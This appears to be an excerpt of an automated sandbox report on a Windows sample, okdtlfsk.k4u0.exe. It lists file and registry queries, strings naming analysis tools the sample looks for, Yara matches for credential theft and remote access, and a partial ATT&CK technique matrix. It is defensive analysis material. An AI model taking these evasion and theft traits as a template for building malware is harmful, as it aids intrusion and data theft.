                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeQueries volume information: C:\Users VolumeInformation
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeQueries volume information: C:\Users\user VolumeInformation
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Steam VolumeInformation
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs VolumeInformation
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_00825490 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_00825490
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcpview.exe
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Procmon.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 00000009.00000003.2333599163.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.2346868214.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.2400076767.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.2347082305.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2333234648.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: okdtlfsk.k4u0.exe PID: 4956, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 00000009.00000003.2333599163.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.2346868214.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.2400076767.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.2347082305.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2333234648.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: okdtlfsk.k4u0.exe PID: 4956, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting
                        1
                        Replication Through Removable Media
                        12
                        Windows Management Instrumentation
                        1
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        21
                        Input Capture
                        1
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Command and Scripting Interpreter
                        1
                        DLL Side-Loading
                        1
                        Windows Service
                        11
                        Deobfuscate/Decode Files or Information
                        LSASS Memory11
                        Peripheral Device Discovery
                        Remote Desktop Protocol21
                        Input Capture
                        Junk DataExfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts3
                        PowerShell
                        1
                        Windows Service
                        12
                        Process Injection
                        31
                        Obfuscated Files or Information
                        Security Account Manager2
